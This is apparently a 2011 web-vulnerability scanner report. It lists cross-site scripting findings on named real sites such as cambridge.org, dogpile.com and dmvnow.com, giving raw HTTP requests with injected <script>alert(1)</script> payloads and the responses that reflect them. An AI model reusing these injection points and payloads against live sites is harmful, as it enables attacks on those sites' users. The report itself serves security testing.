HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:17:39 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:17:39 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:17:39 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: 30ab6cbf9904a435a453 Vary: User-Agent Content-Length: 55420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-includes/js/jquery |
GET /wp-includesde962<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:39 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js11d62<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:15:56 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:15:54 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jqueryd4bf8<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:18 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:15 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-includes/js/jquery |
GET /wp-includes/js/jquery Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:36 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Vary: User-Agent Content-Length: 55434 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /wp-login.php |
GET /wp-login.php9b764<script>alert(1)< Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=b4b02331d8 |
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Fri, 01 Apr 2011 18:16:32 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:16:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: User-Agent Content-Length: 59859 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profi ...[SNIP]... <strong> http://www.androidtapp </strong> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.autobytel.com |
Path: | /favicon.ico |
GET /favicon.icoa3b1c%2522style%253d User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.autobytel.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 Content-Length: 21068 Vary: Accept-Encoding Expires: Fri, 01 Apr 2011 15:44:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 01 Apr 2011 15:44:30 GMT Connection: close Set-Cookie: cweb=JONQJVS10.4.128 Set-Cookie: USER_UUID_VCH=B1598B1E Set-Cookie: ENTERED_POSTAL_CODE_VCH= Set-Cookie: COUNT=0;path=/ Set-Cookie: TIME=%7Bts%20%272011%2D04 Set-Cookie: COUNT=1;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/ Set-Cookie: TIME=%7Bts%20%272011%2D04 Set-Cookie: ID=4%3BABTL;path=/ Set-Cookie: HOMEVERSION=2;path=/ Set-Cookie: ENTERED_POSTAL_CODE_VCH= Set-Cookie: HOMEVERSION=2;path=/ <!-- begin: fnc_getComputerName.cfm --> <!-- end: fnc_getComputerName.cfm --> <!-- ReferringSite: --> <!-- Referer: None --> <!-- This file creates a boxerjam cookie that expires ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.beatthetraffic |
Path: | /widgets/traveltimes.aspx |
GET /widgets/traveltimes.aspx Host: www.beatthetraffic.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 9702 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub p3p: CP="CAO CONi ONL OUR" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Date: Fri, 01 Apr 2011 18:11:28 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Beat the Traffic - Drive Times</title> <LINK ...[SNIP]... <link href="/css/TWC_NewYork4e8e2"style="x:expression ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /favicon.ico |
GET /favicon.ico41430%253cscript User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.cambridge.org Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:20:01 GMT Content-Length: 7320 Connection: close Set-Cookie: ASPSESSIONIDAABDSSSR Set-Cookie: X-Mapping-kcepobcd <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>favicon.ico41430<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/404_error.asp |
GET /uk/404_error.asp7de6f%253cscript Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8439 Date: Fri, 01 Apr 2011 18:16:35 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>404_error.asp7de6f<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/404_error.asp |
GET /uk/404_error.asp?error Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8419 Date: Fri, 01 Apr 2011 18:16:30 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogueimagesecomm ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/images |
GET /uk/catalogue9e993%253cscript Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8419 Date: Fri, 01 Apr 2011 18:16:43 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogue9e993<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/images |
GET /uk/catalogue/images907f0%253cscript Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8419 Date: Fri, 01 Apr 2011 18:16:44 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogueimages907f0<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/images |
GET /uk/catalogue/images Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8419 Date: Fri, 01 Apr 2011 18:16:45 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogueimagesecomm ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/images |
GET /uk/catalogue/images Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8400 Date: Fri, 01 Apr 2011 18:16:30 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogueimagesecomm ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/viewBasket |
GET /uk/catalogue2b0fa%253cscript Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8413 Date: Fri, 01 Apr 2011 18:16:31 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogue2b0fa<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.cambridge.org |
Path: | /uk/catalogue/viewBasket |
GET /uk/catalogue/viewBasket Host: www.cambridge.org Proxy-Connection: keep-alive Referer: http://www.cambridge.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDCCABRQQS |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Vary: Accept-Encoding Cache-Control: private Content-Type: text/html X-Powered-By: ASP.NET Content-Length: 8413 Date: Fri, 01 Apr 2011 18:16:31 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <b>catalogueviewbasket ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dmvnow.com |
Path: | /favicon.ico |
GET /favicon.ico88f92"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.dmvnow.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 500 Internal Server Error Set-Cookie: BIGipServerhttp_pool Server: Microsoft-IIS/5.0 Date: Fri, 01 Apr 2011 17:21:10 GMT X-Powered-By: ASP.NET Connection: close Content-Length: 17377 Content-Type: text/html Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Commonwealth of Virginia Department of ...[SNIP]... <a class="main" href="/webdoc/utilities 404;http://www.dmvnow.com pf=y"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile/ws/redir/ |
GET /dogpile/ws/redir/ Host: www.dogpile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:57:43 GMT Connection: close Content-Length: 45625 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... , more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir/ |
POST /dogpile_other/ws/redir/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com Content-Length: 1960 Cache-Control: max-age=0 Origin: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3741881610 __LASTFOCUS=&__VIEWSTATE= ...[SNIP]... uw8Cmd%2BzyQ0CuYHVhg ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 17:15:19 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 45961 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... , more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir/ |
POST /dogpile_other/ws/redir/ Host: www.dogpile.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com Content-Length: 2186 Cache-Control: max-age=0 Origin: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wsTemp=bigIP+3792213258 __VIEWSTATE=%2FwEPDw ...[SNIP]... iifX%2BBAKw%2FZDRAQI ...[SNIP]... |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3775436042 Set-Cookie: wsRecent=site%3axss.cx X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:57:58 GMT Connection: close Vary: Accept-Encoding, User-Agent Content-Length: 64952 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... , more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.dogpile.com |
Path: | /dogpile_other/ws/redir/ |
GET /dogpile_other/ws/redir/ Host: www.dogpile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:58:37 GMT Connection: close Content-Length: 45962 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... pon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/redir/ |
GET /dogpile_rss/ws/redir/ Host: www.dogpile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:59:08 GMT Connection: close Content-Length: 45875 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... pon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/redir/ |
GET /dogpile_rss/ws/redir/ Host: www.dogpile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3792213258 Set-Cookie: wsRecent=Go+Daddy+CEO X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:59:25 GMT Connection: close Content-Length: 103613 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... pon, more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.dogpile.com |
Path: | /dogpile_rss/ws/redir/ |
GET /dogpile_rss/ws/redir/ Host: www.dogpile.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: DomainSession=Transa Set-Cookie: DomainUserProfile Set-Cookie: wsTemp=bigIP+3725104394 Set-Cookie: wsRecent=MLB+Schedule,Web X-Powered-By: ASP.NET Date: Fri, 01 Apr 2011 16:59:34 GMT Connection: close Content-Length: 145639 Vary: Accept-Encoding, User-Agent <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... , more"; var addthis_offset_top = 20; var addthis_hover_delay = 0; var addthis_append_data = true; var addthis_share_url = 'http://www.dogpile.com var callback_server_url = 'http://www.dogpile.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kicksonfire |
Path: | /favicon.ico |
GET /favicon.ico4dbf7</script><script User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.kicksonfire.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 01 Apr 2011 16:21:36 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Pingback: http://www.kicksonfire X-Powered-By: W3 Total Cache/0.9.1.4b Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 16:21:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 21954 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns:fb="http://www ...[SNIP]... <script> COMSCORE.beacon({ c1:2, c2:6685975, c3:"", c4:"www.kicksonfire.com c5:"", c6:"", c15:"" }); </script> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.ny1.com |
Path: | /App_Skins/news1/favicon |
